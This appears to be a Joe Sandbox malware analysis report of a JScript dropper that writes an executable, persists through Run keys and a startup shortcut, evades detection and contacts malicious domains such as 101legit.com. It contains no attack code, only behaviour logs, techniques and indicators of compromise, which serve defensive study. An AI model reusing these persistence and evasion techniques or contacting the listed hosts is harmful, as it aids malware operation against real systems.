Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA3BF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,7_2_00007FF7C0BA3BF0
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B96CEC RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,SysFreeString,RegCloseKey,RegCloseKey,7_2_00007FF7C0B96CEC
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA0E04 RtlInitializeCriticalSection,GetVersionExA,7_2_00007FF7C0BA0E04
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B991AC GetUserDefaultLCID,CreateBindCtx,7_2_00007FF7C0B991AC
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B94FE0 CreateBindCtx,SysAllocStringByteLen,SysFreeString,7_2_00007FF7C0B94FE0
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B9C370 CreateBindCtx,MkParseDisplayName,7_2_00007FF7C0B9C370

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Startup Items1Startup Items1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting13Registry Run Keys / Startup Folder21Process Injection112Virtualization/Sandbox Evasion12LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothData Encoding1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Registry Run Keys / Startup Folder21Process Injection112Security Account ManagerSecurity Software Discovery121SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting13NTDSVirtualization/Sandbox Evasion12Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery125Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 365904 Sample: xPUqa4qbDL Startdate: 10/03/2021 Architecture: WINDOWS Score: 88 46 Multi AV Scanner detection for domain / URL 2->46 48 Multi AV Scanner detection for submitted file 2->48 8 wscript.exe 5 2->8         started        11 ibfmvoj.exe 2->11         started        13 ibfmvoj.exe 2->13         started        15 ibfmvoj.exe 2->15         started        process3 signatures4 58 Benign windows process drops PE files 8->58 60 JScript performs obfuscated calls to suspicious functions 8->60 17 wscript.exe 1 9 8->17         started        process5 dnsIp6 40 101legit.com 72.52.178.23, 49703, 80 LIQUIDWEBUS United States 17->40 42 legitville.com 204.11.56.48, 49702, 80 CONFLUENCE-NETWORK-INCVG Virgin Islands (BRITISH) 17->42 44 2 other IPs or domains 17->44 32 C:\Users\user\AppData\Local\...\ibfmvoj.exe, PE32+ 17->32 dropped 34 C:\Users\user\AppData\...\ttdwagotd.lnk, MS 17->34 dropped 36 C:\Users\user\AppData\Local\nsoerwoel\qihyo, ASCII 17->36 dropped 50 System process connects to network (likely due to code injection or exploit) 17->50 52 Renames wscript.exe to bypass HIPS 17->52 22 ibfmvoj.exe 1 17->22         started        25 ibfmvoj.exe 1 17->25         started        28 cmd.exe 1 17->28         started        file7 signatures8 process9 file10 54 JScript performs obfuscated calls to suspicious functions 22->54 56 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 22->56 38 C:\Users\user\AppData\Local\...\pfuryr.js, ISO-8859 25->38 dropped 30 conhost.exe 28->30         started        signatures11 process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
xPUqa4qbDL.js36%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
101legit.com6%VirustotalBrowse
legitville.com2%VirustotalBrowse
ww7.101legit.com6%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://101legit.com/6%VirustotalBrowse
http://101legit.com/0%Avira URL Cloudsafe
http://101legit.com/0.htmle8430%Avira URL Cloudsafe
http://101legit.com/0.html7%VirustotalBrowse
http://101legit.com/0.html0%Avira URL Cloudsafe
http://101legit.com/0.html10%Avira URL Cloudsafe
https://assets.onestore.ms0%URL Reputationsafe
https://assets.onestore.ms0%URL Reputationsafe
https://assets.onestore.ms0%URL Reputationsafe
http://ww7.101legit.com/ll0%Avira URL Cloudsafe
https://products.office~0%Avira URL Cloudsafe
http://legitville.com/0.htmlll0%Avira URL Cloudsafe
https://mem.gfx.ms0%URL Reputationsafe
https://mem.gfx.ms0%URL Reputationsafe
https://mem.gfx.ms0%URL Reputationsafe
http://ww7.101legit.com/0%Avira URL Cloudsafe
https://mem.gfx.ms/meversion?partner=MSHomePage&amp;market=de-ch&amp;uhf=10%URL Reputationsafe
https://mem.gfx.ms/meversion?partner=MSHomePage&amp;market=de-ch&amp;uhf=10%URL Reputationsafe
https://mem.gfx.ms/meversion?partner=MSHomePage&amp;market=de-ch&amp;uhf=10%URL Reputationsafe
http://legitville.com/0.html0%Avira URL Cloudsafe
https://azure.micro0%Avira URL Cloudsafe
http://ww7.101legit.com0%Avira URL Cloudsafe
http://legitville.com/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
76899.bodis.com
199.59.242.153
truefalse
    high
    101legit.com
    72.52.178.23
    truetrueunknown
    legitville.com
    204.11.56.48
    truetrueunknown
    ww7.101legit.com
    unknown
    unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://101legit.com/0.htmltrue
    • 7%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://ww7.101legit.com/true
    • Avira URL Cloud: safe
    unknown
    http://legitville.com/0.htmltrue
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://outlook.live.com/owa/wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
      high
      http://101legit.com/wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmptrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://www.onenote.com/?omkt=de-CHwscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
        high
        http://101legit.com/0.htmle843wscript.exe, 00000002.00000003.202889828.000002156F338000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://microsoftwindows.112.2o7.netwscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202797295.000002156F850000.00000004.00000001.sdmpfalse
          high
          https://onedrive.live.com/about/de-ch/wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
            high
            http://requirejs.org/docs/errors.html#wscript.exe, 00000002.00000003.210219910.000002156F351000.00000004.00000001.sdmpfalse
              high
              http://github.com/requirejs/requirejs/LICENSEwscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                high
                https://swiftkey.com/images/misc/stores/app/en.pngwscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpfalse
                  high
                  http://101legit.com/0.html1wscript.exe, 00000002.00000002.459496028.000002156F700000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://products.office.com/de-ch/academic/compare-office-365-education-planswscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                    high
                    https://assets.onestore.mswscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.skype.com/de/wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                      high
                      http://ww7.101legit.com/llwscript.exe, 00000002.00000003.210589425.000002156F82B000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.youtube.com/user/MicrosoftCHwscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                        high
                        https://products.office~wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://legitville.com/0.htmlllwscript.exe, 00000002.00000003.339266046.000002156F320000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://mem.gfx.mswscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.210173138.000002156F279000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://publisher.liveperson.net/iframe-le-tag/iframe.html?lpsite=60270350&amp;lpsection=store-saleswscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpfalse
                          high
                          https://mem.gfx.ms/meversion?partner=MSHomePage&amp;market=de-ch&amp;uhf=1wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://github.com/requirejs/domReadywscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                            high
                            https://schema.org/ItemListwscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                              high
                              https://twitter.com/microsoft_chwscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                high
                                https://azure.microwscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.instagram.com/microsoftch/wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.linkedin.com/company/1035wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                    high
                                    https://www.xbox.com/wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                      high
                                      http://github.com/aFarkas/lazysizeswscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                        high
                                        https://publisher.liveperson.netwscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpfalse
                                          high
                                          http://schema.org/Organizationwscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                            high
                                            http://ww7.101legit.comwscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://channel9.msdn.com/wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpfalse
                                              high
                                              http://legitville.com/wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              72.52.178.23
                                              101legit.comUnited States
                                              32244LIQUIDWEBUStrue
                                              199.59.242.153
                                              76899.bodis.comUnited States
                                              395082BODIS-NJUSfalse
                                              204.11.56.48
                                              legitville.comVirgin Islands (BRITISH)
                                              40034CONFLUENCE-NETWORK-INCVGtrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:365904
                                              Start date:10.03.2021
                                              Start time:07:00:50
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 6m 22s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:xPUqa4qbDL (renamed file extension from none to js)
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:35
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (Javascript)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal88.evad.winJS@13/12@3/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 100% (good quality ratio 36.2%)
                                              • Quality average: 25.8%
                                              • Quality standard deviation: 38.8%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              Warnings:
                                              Show All
                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 40.88.32.150, 92.122.145.220, 92.122.145.53, 168.61.161.212, 51.104.139.180, 184.30.24.56, 93.184.221.240, 20.54.26.129, 92.122.213.247, 92.122.213.194, 52.147.198.201, 104.43.193.48
                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, e13678.dscb.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, www.microsoft.com
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              07:01:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run uobmovqn "C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe" "C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js"
                                              07:01:41API Interceptor2x Sleep call for process: wscript.exe modified
                                              07:01:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run uobmovqn "C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe" "C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js"
                                              07:01:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnk

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              72.52.178.2381msxxUisn.exeGet hashmaliciousBrowse
                                              • www.nogrudge.com/ndm/?ndkdxd=UXX0bLfxYLyH&mHLDZX=H2A+iUcBXA4pvzlpLnHoTtAhYe/AosYsS6mssCYUdSkJoc9KzWoLI56ChKKWBKP76/3sWxYIhQ==
                                              Q38V8rfI5H.jsGet hashmaliciousBrowse
                                              • 101legit.com/0.html
                                              Q38V8rfI5H.jsGet hashmaliciousBrowse
                                              • 101legit.com/0.html
                                              7IEK8G8P67.jsGet hashmaliciousBrowse
                                              • 101legit.com/0.html
                                              7IEK8G8P67.jsGet hashmaliciousBrowse
                                              • 101legit.com/0.html
                                              PI 11172020.xlsxGet hashmaliciousBrowse
                                              • www.paragonic.com/egem/?Ob20Lf_=+SOZmDNuyMcuxJO1TLnPFsdIsmdtl1qFj/QFY12FkiWknvVrPNzDCdooHZfrGkV6uT0+EQ==&BB6=L48xY
                                              SKMBT 25032020 Ref- 0000019.exeGet hashmaliciousBrowse
                                              • www.aalldxea.com/pg/
                                              4535B9F39E debt payment invoice #U007epdf.jsGet hashmaliciousBrowse
                                              • canonsupervideo4k.ws/3yiqvg7v
                                              4535B9F39E debt payment invoice #U007epdf.jsGet hashmaliciousBrowse
                                              • canonsupervideo4k.ws/3yiqvg7v
                                              199.59.242.153PO #6093245.exeGet hashmaliciousBrowse
                                              • www.columbiapatientsafety.com/b3pu/?kzrxUJ=Po+ooE/DTuM+SNsPvO9X33bQcBYkN9VVSpga1iLrEH685rCxHFclWjqsXp2fuCLu/+rZ&mBy=wZOTMdR8Z49L4
                                              1feiNnK6Qd.exeGet hashmaliciousBrowse
                                              • www.krishnagiri.info/nsag/?arX=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo&9rdX=bJEPUthHNB
                                              bXSINeHUUZ.dllGet hashmaliciousBrowse
                                              • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0527-3817-b78c-1499536b2816
                                              R8WWx5t2RE.dllGet hashmaliciousBrowse
                                              • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0525-1690-a44f-893fe3fe808a
                                              KCCAfipQl2.dllGet hashmaliciousBrowse
                                              • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20210309-0523-4094-953a-a3979b22da2d
                                              Confirmaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                              • www.upmchealhtrak.com/uidr/?tFQt=EJZKOT9ZCEKBmohuC2k9yF0p2trzw4QyidNomzMnQ/ct05beZhyUzb0V3MCAx6o5O4uT&CTp0=ctxDHzZH
                                              twistercrypted.exeGet hashmaliciousBrowse
                                              • www.checkmategmaing.com/e3rp/?j8pPk=WoT9kU8rqi/cGZL03oGYdUMw0kSwjDQq+YneiDuMSKhXxULaCpep70maN8hHS2zUupty&iJ=yL3dpJexppT
                                              Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                              • www.atz.xyz/uqf5/?Y4pXFx5x=9R7mWhibPviiLk5eV4s6uz/T/8hHJufzZ1ieMJl7LRomqj4xOZDdgVablK5grD0qowC2V5GUvg==&BR-=UTjHnDN0Jp9hlD
                                              PO_210222.exeGet hashmaliciousBrowse
                                              • www.eledtrik.com/dka/?9rYD4D2P=eOs6xd3Ml1PMRUlbDAfSVpAT1Vk8+bdcXqll9ZJxBwkAhsvksTKjTIh/2VIoKnKzbzZo&4h=vTxdADNprBU8ur
                                              DHL Document. PDF.exeGet hashmaliciousBrowse
                                              • www.planethomrlending.com/d8ak/?Szr0s4=muDBtN5C7gxarYEMHW0HQdb5sxbxLt5mXwS4NwCRlsIowigLClLzNrWqRxy8FKdZHTfe3rxTxw==&QL3=uTyTqJdh5XE07
                                              Payment advice.xlsGet hashmaliciousBrowse
                                              • ww25.findresults.site/?rpid=5PO84Q269&subid1=20210216-1943-0088-a8ce-7e3bf2dc56d1
                                              8nxKYwJna8.exeGet hashmaliciousBrowse
                                              • www.traptlongview.com/csv8/?UT=EhUhb4&OjKL3=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjOxon4Fjc0
                                              gRd8HGFpL7.exeGet hashmaliciousBrowse
                                              • www.fallguysmovile.com/kgw/?8pBp5p=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs85UuSrS+8ZI+ZgfU1g==&LXPL=yvqlQXkhnxmxPrbP
                                              DHL eShipment invoice_pdf.exeGet hashmaliciousBrowse
                                              • www.401ktrsretire.com/u2km/?Mvmx=B0k1Yb4MawxPLjWyGktSQMDpcKkODwmirhnhWS+Vo9XV9ofHvPKBx5I+TCgZKXjvwWTr&_PXh=xxlLi
                                              bAcefnEUjb.exeGet hashmaliciousBrowse
                                              • www.bigdudedesign.com/xle/?mdsh-n6=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7tc0TzIhsDi0JEkXg==&lZN=7neHzjSxG
                                              Xi4vVgHekF.exeGet hashmaliciousBrowse
                                              • www.tamilfgun.com/rina/?GFQL=e/BgiNa0Nzl6UsiYB5UQwDPPSQ8F3U8y9racLRUpmblz1Tud/bjp2j9Ybm0mnAyqoOqa&wFN0DX=UtX8E
                                              q2EKWldniJ.exeGet hashmaliciousBrowse
                                              • www.traptlongview.com/csv8/?0bGHQH3=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWP0ypLDGU9liE66TA==&OVlhnL=o2J8lZBpAfJxQ2MP
                                              Inv_9876567.docGet hashmaliciousBrowse
                                              • www.beeriderrebates.com/rcm/?AN=F1HB7K90F0MHqluK4kkhjYJfrVu8LZyU6DVhmM+rm+KrWrRFJs8bddwSly3mZm2SV1SoOQ==&v0D8fJ=ZvMhsfAX
                                              4NoiNHCNoU.exeGet hashmaliciousBrowse
                                              • www.artdonline.com/wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=xHc9ODtVxj0eUWmi3yu1PHJO+9FS2s4H+8Xc5Nf8URN5DAD0y+vEo6QceVJID6bTGhq7
                                              mtsWWNDaNF.exeGet hashmaliciousBrowse
                                              • www.traptlongview.com/csv8/?9r=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslVjOxon4Fjc0&w2=jFQp32IXi

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              76899.bodis.com7IEK8G8P67.jsGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              101legit.com7IEK8G8P67.jsGet hashmaliciousBrowse
                                              • 72.52.178.23
                                              emwkvlhvf.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              emwkvlhvf.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              vrswuyr.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              vrswuyr.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              test.jsGet hashmaliciousBrowse
                                              • 198.54.117.244
                                              test.jsGet hashmaliciousBrowse
                                              • 198.54.117.244
                                              qrlyyqnmy.jsGet hashmaliciousBrowse
                                              • 198.54.117.244
                                              diboj.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              diboj.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              ajwngsj.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              ajwngsj.jsGet hashmaliciousBrowse
                                              • 127.0.0.1
                                              nbmvwchp.jsGet hashmaliciousBrowse
                                              • 198.54.117.244
                                              legitville.comQ38V8rfI5H.jsGet hashmaliciousBrowse
                                              • 204.11.56.48
                                              Q38V8rfI5H.jsGet hashmaliciousBrowse
                                              • 204.11.56.48
                                              7IEK8G8P67.jsGet hashmaliciousBrowse
